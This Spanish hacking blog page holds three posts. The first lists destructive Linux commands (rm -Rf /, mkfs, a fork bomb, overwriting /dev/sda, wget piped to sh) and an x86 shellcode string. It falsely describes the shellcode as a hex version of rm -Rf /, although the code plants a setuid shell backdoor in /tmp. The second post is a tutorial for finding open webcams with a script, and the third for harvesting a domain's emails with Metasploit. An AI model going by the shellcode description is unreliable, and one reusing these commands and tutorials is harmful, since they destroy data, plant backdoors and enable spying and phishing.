Síguenos

Monday, December 9, 2019

7 Comandos de la muerte en linux


Así que eres un hacker y te jactas de saberlo todo? Sabías que existen ciertos comandos que, cuando tu los ejecutas en linux, pueden otear el sistema y en algunos casos, hasta dejarlo inutilizado? Pues en este post te traigo los 7 comandos de la muerte que existen en linux, de tal manera que se describe su accionar, para que sirve y porque el comando es mortal. 

1)  # rm -Rf /

Este comando sirve para eliminar a la fuerza, de manera recursiva, todos los directorios que se encuentren en el directorio raíz del sistema. 

2)  char esp[] __attribute__ ((section(”.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68?
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99?
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7?
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56?
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31?
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69?
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00?
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

Hace lo mismo que el comando anterior, pero  esta escrito de forma hexadecimal, una manera de engañar a usuarios mas experimentados. 

3) # mkfs.ext3 /dev/sda

Formatea y elimina todos los archivos del dispositivo seleccionado

4)  : (){:|:&};:

llamado "bomba fork" lo que hace es  que, recursivamente, se ejecuten un montón de procesos lo que hace que la maquina crashee. Esto conlleva pérdida de datos.

5) cualquier_comando > /dev/sda

Comando para enviar bloques de datos al sistema seleccionado, lo que puede acarrear perdida total de datos. 

6) wget http://fuente_de_origen_inseguro -O- | sh

Baja y ejecuta automáticamente un archivo de internet sin pedir permisos de ejecución. OJO nunca hacer esto, es peligrosísimo. 

7) mv /home/tudirectoriodeusuario/* /dev/null

Este comando mueve todos los archivos dentro de tu home a un lugar que no existe, por lo cual, nunca podrás ver tus archivos de nuevo y se perderán para siempre. Horrible destino para tus archivos.

Friday, December 6, 2019

Tutorial: Encuentra camaras web abiertas alrededor del planeta. Cam hackers en github


El dia de hoy vengo a traer a ustedes un tutorial de un script que recién salió en github y que puede resolver una de las dudas que más tienen las personas que quieren entrar en el mundo del hacking: Como ver camaras abiertas en la web. Lo haremos en kali linux ya que esta plataforma posee todo lo necesario para ejecutar el script sin tener que descargar una tonelada de scripts complementarios. 

En esta ocasión utilizaremos un script llamado cam-hacker, disponible gratuitamente en github y que está escrito en python3. Cabe resaltar, que necesitas tener instalado python3 y su complemento pip para que el script funcione. 

apt-get install python3

Lo primero será descargarlo de github y descomprimirlo. Tras esto, abrimos una consola en la carpeta descomprimida en instalamos los requerimientos con la siguiente orden:

pip3 install requests

python3 cam-hackers.py

Con lo cual ya estaremos ejecutando el script. A continuacion dejo un video que muestra el paso a paso de como utilizar esta aplicación gratuita. Cualquier pregunta no olvides ponerla en la caja de comentarios. muchas gracias y nos veremos en una proxima ocasion. hasta luego. 

Wednesday, December 4, 2019

Tutorial: Como extraer listas de correos de una página web específica con metasploit


Hola todos los internautas que pasan por este rincón del Internet. El dia de hoy vengo a ofrecerles un pequeño tutorial sobre cómo extraer correos de un dominio en particular a través de la herramienta de pentesting metasploit. 

Cabe resaltar, de nuevo, que el uso que se le da a esta herramienta es puramente educativo y en ningún momento pretende realizar actividades de phishing u otros fraudes, que es lo que haría generalmente un script kiddie que tuviese acceso a esta información. El uso que le den ustedes recae completamente en su propia responsabilidad. 

Para hacerlo necesitarás metasploit. Si no lo tienes puedes descargarlo gratuitamente de github desde este link.

Dicho esto, utilizar el módulo de recolección de emails es estúpidamente fácil. Una vez instalado metasploit framework en tu pc, lo único que deberás hacer es inicializarlo y escribir los siguientes comandos, uno a uno, en la terminal de Metasploit: 

search gather
use gather/search_email_collector
set domain (aqui va el dominio que quieras analizar), sin http:// o / ex: google.com
run

Esperamos unos 30 segundos y listo! tenemos la lista de correos del dominio que hayamos escogido para analizar. Para más claridad, a continuación dejo un video explicando el procedimiento a profundidad de manera gráfica. Si tienes alguna pregunta no olvides ponerla en la caja de comentarios. 

Related Posts Plugin for WordPress, Blogger...